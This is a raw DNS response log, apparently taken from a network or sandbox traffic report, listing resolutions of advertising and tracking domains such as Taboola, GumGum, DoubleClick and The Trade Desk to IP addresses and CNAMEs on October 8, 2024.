                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.214554071 CEST1.1.1.1192.168.2.40x852fNo error (0)sb.scorecardresearch.com108.139.243.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.214554071 CEST1.1.1.1192.168.2.40x852fNo error (0)sb.scorecardresearch.com108.139.243.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.214554071 CEST1.1.1.1192.168.2.40x852fNo error (0)sb.scorecardresearch.com108.139.243.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.214554071 CEST1.1.1.1192.168.2.40x852fNo error (0)sb.scorecardresearch.com108.139.243.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.218851089 CEST1.1.1.1192.168.2.40xf7c6No error (0)usersync.gumgum.com34.247.233.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.218851089 CEST1.1.1.1192.168.2.40xf7c6No error (0)usersync.gumgum.com52.210.15.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.218851089 CEST1.1.1.1192.168.2.40xf7c6No error (0)usersync.gumgum.com34.247.205.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.969569921 CEST1.1.1.1192.168.2.40x60beNo error (0)cdn.indexww.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.970904112 CEST1.1.1.1192.168.2.40x6440No error (0)cdn.indexww.com104.18.38.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:41.970904112 CEST1.1.1.1192.168.2.40x6440No error (0)cdn.indexww.com172.64.149.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.220344067 CEST1.1.1.1192.168.2.40xee9fNo error (0)googleads.g.doubleclick.net142.250.186.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.221422911 CEST1.1.1.1192.168.2.40xcf33No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.482654095 CEST1.1.1.1192.168.2.40xfe7eNo error (0)cms.quantserve.com2kpixel.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.482654095 CEST1.1.1.1192.168.2.40xfe7eNo error (0)2kpixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.482654095 CEST1.1.1.1192.168.2.40xfe7eNo error (0)global.px.quantserve.com91.228.74.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.482654095 CEST1.1.1.1192.168.2.40xfe7eNo error (0)global.px.quantserve.com91.228.74.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.482654095 CEST1.1.1.1192.168.2.40xfe7eNo error (0)global.px.quantserve.com91.228.74.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.482654095 CEST1.1.1.1192.168.2.40xfe7eNo error (0)global.px.quantserve.com91.228.74.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.482990026 CEST1.1.1.1192.168.2.40x4d50No error (0)cms.quantserve.com2kpixel.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.482990026 CEST1.1.1.1192.168.2.40x4d50No error (0)2kpixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.522562027 CEST1.1.1.1192.168.2.40x6af8No error (0)sync.serverbid.comd1giprow6b9psh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.522562027 CEST1.1.1.1192.168.2.40x6af8No error (0)d1giprow6b9psh.cloudfront.net18.66.102.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.522562027 CEST1.1.1.1192.168.2.40x6af8No error (0)d1giprow6b9psh.cloudfront.net18.66.102.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.522562027 CEST1.1.1.1192.168.2.40x6af8No error (0)d1giprow6b9psh.cloudfront.net18.66.102.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.522562027 CEST1.1.1.1192.168.2.40x6af8No error (0)d1giprow6b9psh.cloudfront.net18.66.102.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.524301052 CEST1.1.1.1192.168.2.40x9760No error (0)data.adsrvr.orgmatch.adsrvr.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.524301052 CEST1.1.1.1192.168.2.40x9760No error (0)match.adsrvr.org35.71.131.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.524301052 CEST1.1.1.1192.168.2.40x9760No error (0)match.adsrvr.org3.33.220.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.524301052 CEST1.1.1.1192.168.2.40x9760No error (0)match.adsrvr.org52.223.40.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.524301052 CEST1.1.1.1192.168.2.40x9760No error (0)match.adsrvr.org15.197.193.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.524331093 CEST1.1.1.1192.168.2.40xed16No error (0)sync.serverbid.comd1giprow6b9psh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.526101112 CEST1.1.1.1192.168.2.40xf3a1No error (0)cs.krushmedia.com8.2.110.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:42.526767015 CEST1.1.1.1192.168.2.40x1157No error (0)data.adsrvr.orgmatch.adsrvr.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.619256020 CEST1.1.1.1192.168.2.40x5d35No error (0)i.clean.gg34.95.69.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.619525909 CEST1.1.1.1192.168.2.40x17e9No error (0)i.clean.gg34.95.69.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.619553089 CEST1.1.1.1192.168.2.40x33ebNo error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.619553089 CEST1.1.1.1192.168.2.40x33ebNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.619553089 CEST1.1.1.1192.168.2.40x33ebNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.619553089 CEST1.1.1.1192.168.2.40x33ebNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.619553089 CEST1.1.1.1192.168.2.40x33ebNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.620953083 CEST1.1.1.1192.168.2.40x83a9No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.667988062 CEST1.1.1.1192.168.2.40xfb84No error (0)ssp.disqus.comzeta-ssp-385516103.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.667988062 CEST1.1.1.1192.168.2.40xfb84No error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com34.233.107.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.667988062 CEST1.1.1.1192.168.2.40xfb84No error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com54.162.113.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.667988062 CEST1.1.1.1192.168.2.40xfb84No error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com3.209.23.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.667988062 CEST1.1.1.1192.168.2.40xfb84No error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com3.218.235.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.667988062 CEST1.1.1.1192.168.2.40xfb84No error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com54.85.224.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.667988062 CEST1.1.1.1192.168.2.40xfb84No error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com52.205.42.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.667988062 CEST1.1.1.1192.168.2.40xfb84No error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com52.205.29.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.667988062 CEST1.1.1.1192.168.2.40xfb84No error (0)zeta-ssp-385516103.us-east-1.elb.amazonaws.com44.194.204.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:43.668693066 CEST1.1.1.1192.168.2.40x4bb1No error (0)ssp.disqus.comzeta-ssp-385516103.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.047595024 CEST1.1.1.1192.168.2.40x31acNo error (0)trc-events.taboola.comam-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.047595024 CEST1.1.1.1192.168.2.40x31acNo error (0)am-vip001.taboola.com141.226.228.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.048626900 CEST1.1.1.1192.168.2.40xaafNo error (0)trc-events.taboola.comam-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.371515989 CEST1.1.1.1192.168.2.40x8976No error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.371515989 CEST1.1.1.1192.168.2.40x8976No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.371515989 CEST1.1.1.1192.168.2.40x8976No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.371515989 CEST1.1.1.1192.168.2.40x8976No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.371515989 CEST1.1.1.1192.168.2.40x8976No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.373181105 CEST1.1.1.1192.168.2.40x3adcNo error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.391994953 CEST1.1.1.1192.168.2.40xd590No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.392283916 CEST1.1.1.1192.168.2.40x8d46No error (0)www.google.com142.250.74.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.415096045 CEST1.1.1.1192.168.2.40xec09No error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.415096045 CEST1.1.1.1192.168.2.40xec09No error (0)image6v2.pubmnet.compugm-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.416014910 CEST1.1.1.1192.168.2.40xa22cNo error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.416014910 CEST1.1.1.1192.168.2.40xa22cNo error (0)image6v2.pubmnet.compugm-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.416014910 CEST1.1.1.1192.168.2.40xa22cNo error (0)pugm-lhrc.pubmnet.com185.64.190.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.494008064 CEST1.1.1.1192.168.2.40x9480No error (0)idpix.media6degrees.comidpix.media6degrees.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.494008064 CEST1.1.1.1192.168.2.40x9480No error (0)map.media6degrees.commap.media6degrees.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.495882988 CEST1.1.1.1192.168.2.40x3f62No error (0)idpix.media6degrees.comidpix.media6degrees.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.495882988 CEST1.1.1.1192.168.2.40x3f62No error (0)map.media6degrees.commap.media6degrees.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.794914961 CEST1.1.1.1192.168.2.40x9ba8No error (0)cdn.indexww.com104.18.38.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.794914961 CEST1.1.1.1192.168.2.40x9ba8No error (0)cdn.indexww.com172.64.149.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.795663118 CEST1.1.1.1192.168.2.40x7e28No error (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.795804977 CEST1.1.1.1192.168.2.40xbe08No error (0)dsum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.795804977 CEST1.1.1.1192.168.2.40xbe08No error (0)dsum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.795970917 CEST1.1.1.1192.168.2.40x5c1eNo error (0)cdn.indexww.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.852526903 CEST1.1.1.1192.168.2.40x3aaNo error (0)sync.go.sonobi.comiad-2-sync.go.sonobi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.852546930 CEST1.1.1.1192.168.2.40x631dNo error (0)sync.go.sonobi.comiad-2-sync.go.sonobi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.852546930 CEST1.1.1.1192.168.2.40x631dNo error (0)iad-2-sync.go.sonobi.com69.166.1.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.852546930 CEST1.1.1.1192.168.2.40x631dNo error (0)iad-2-sync.go.sonobi.com69.166.1.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.852546930 CEST1.1.1.1192.168.2.40x631dNo error (0)iad-2-sync.go.sonobi.com69.166.1.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.852546930 CEST1.1.1.1192.168.2.40x631dNo error (0)iad-2-sync.go.sonobi.com69.166.1.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.966437101 CEST1.1.1.1192.168.2.40x8f63No error (0)ssum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.966437101 CEST1.1.1.1192.168.2.40x8f63No error (0)ssum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.967055082 CEST1.1.1.1192.168.2.40x45e2No error (0)ssum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.971668005 CEST1.1.1.1192.168.2.40xeee4No error (0)rtb.gumgum.com52.16.119.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.971668005 CEST1.1.1.1192.168.2.40xeee4No error (0)rtb.gumgum.com52.210.231.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.971668005 CEST1.1.1.1192.168.2.40xeee4No error (0)rtb.gumgum.com54.194.165.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.971668005 CEST1.1.1.1192.168.2.40xeee4No error (0)rtb.gumgum.com52.210.179.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.971668005 CEST1.1.1.1192.168.2.40xeee4No error (0)rtb.gumgum.com54.171.108.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.971668005 CEST1.1.1.1192.168.2.40xeee4No error (0)rtb.gumgum.com52.16.88.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.971668005 CEST1.1.1.1192.168.2.40xeee4No error (0)rtb.gumgum.com108.128.218.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.971668005 CEST1.1.1.1192.168.2.40xeee4No error (0)rtb.gumgum.com52.214.64.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.983530045 CEST1.1.1.1192.168.2.40xba38No error (0)sync.serverbid.comd1giprow6b9psh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.992985010 CEST1.1.1.1192.168.2.40xeeecNo error (0)sync.serverbid.comd1giprow6b9psh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.992985010 CEST1.1.1.1192.168.2.40xeeecNo error (0)d1giprow6b9psh.cloudfront.net18.66.102.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.992985010 CEST1.1.1.1192.168.2.40xeeecNo error (0)d1giprow6b9psh.cloudfront.net18.66.102.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.992985010 CEST1.1.1.1192.168.2.40xeeecNo error (0)d1giprow6b9psh.cloudfront.net18.66.102.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:44.992985010 CEST1.1.1.1192.168.2.40xeeecNo error (0)d1giprow6b9psh.cloudfront.net18.66.102.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.902084112 CEST1.1.1.1192.168.2.40x2385No error (0)sync.mathtag.compixel-origin.mathtag.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.902084112 CEST1.1.1.1192.168.2.40x2385No error (0)pixel-origin.mathtag.com74.121.140.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.902084112 CEST1.1.1.1192.168.2.40x2385No error (0)pixel-origin.mathtag.com216.200.232.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.902084112 CEST1.1.1.1192.168.2.40x2385No error (0)pixel-origin.mathtag.com216.200.232.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.902514935 CEST1.1.1.1192.168.2.40xf6cNo error (0)rtb.adentifi.com3.220.154.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.902514935 CEST1.1.1.1192.168.2.40xf6cNo error (0)rtb.adentifi.com54.165.51.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.902514935 CEST1.1.1.1192.168.2.40xf6cNo error (0)rtb.adentifi.com44.218.170.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.902514935 CEST1.1.1.1192.168.2.40xf6cNo error (0)rtb.adentifi.com44.206.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.902514935 CEST1.1.1.1192.168.2.40xf6cNo error (0)rtb.adentifi.com52.200.121.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.902514935 CEST1.1.1.1192.168.2.40xf6cNo error (0)rtb.adentifi.com52.0.191.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.902606010 CEST1.1.1.1192.168.2.40x81f7No error (0)sync.mathtag.compixel-origin.mathtag.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.903166056 CEST1.1.1.1192.168.2.40x2a95No error (0)us.creativecdn.com185.184.10.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.903661013 CEST1.1.1.1192.168.2.40x2e97No error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.904329062 CEST1.1.1.1192.168.2.40x1b17No error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.904329062 CEST1.1.1.1192.168.2.40x1b17No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.904329062 CEST1.1.1.1192.168.2.40x1b17No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.904329062 CEST1.1.1.1192.168.2.40x1b17No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.904329062 CEST1.1.1.1192.168.2.40x1b17No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907128096 CEST1.1.1.1192.168.2.40xbc12No error (0)gw-iad-bid.ymmobi.comgw-iad-ym.yeahmobi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907128096 CEST1.1.1.1192.168.2.40xbc12No error (0)gw-iad-ym.yeahmobi.combid-iad-static.yeahtargeter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907140970 CEST1.1.1.1192.168.2.40xc5acNo error (0)sync.mathtag.compixel-origin.mathtag.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907140970 CEST1.1.1.1192.168.2.40xc5acNo error (0)pixel-origin.mathtag.com216.200.232.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907140970 CEST1.1.1.1192.168.2.40xc5acNo error (0)pixel-origin.mathtag.com216.200.232.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907140970 CEST1.1.1.1192.168.2.40xc5acNo error (0)pixel-origin.mathtag.com74.121.140.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907763004 CEST1.1.1.1192.168.2.40xcfb2No error (0)gw-iad-bid.ymmobi.comgw-iad-ym.yeahmobi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907763004 CEST1.1.1.1192.168.2.40xcfb2No error (0)gw-iad-ym.yeahmobi.combid-iad-static.yeahtargeter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907763004 CEST1.1.1.1192.168.2.40xcfb2No error (0)bid-iad-static.yeahtargeter.com47.253.61.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907778025 CEST1.1.1.1192.168.2.40x25a2No error (0)rtb.adentifi.com54.165.51.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907778025 CEST1.1.1.1192.168.2.40x25a2No error (0)rtb.adentifi.com52.0.191.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:45.907778025 CEST1.1.1.1192.168.2.40x25a2No error (0)rtb.adentifi.com44.218.170.50A (IP address)IN (0x0001)false
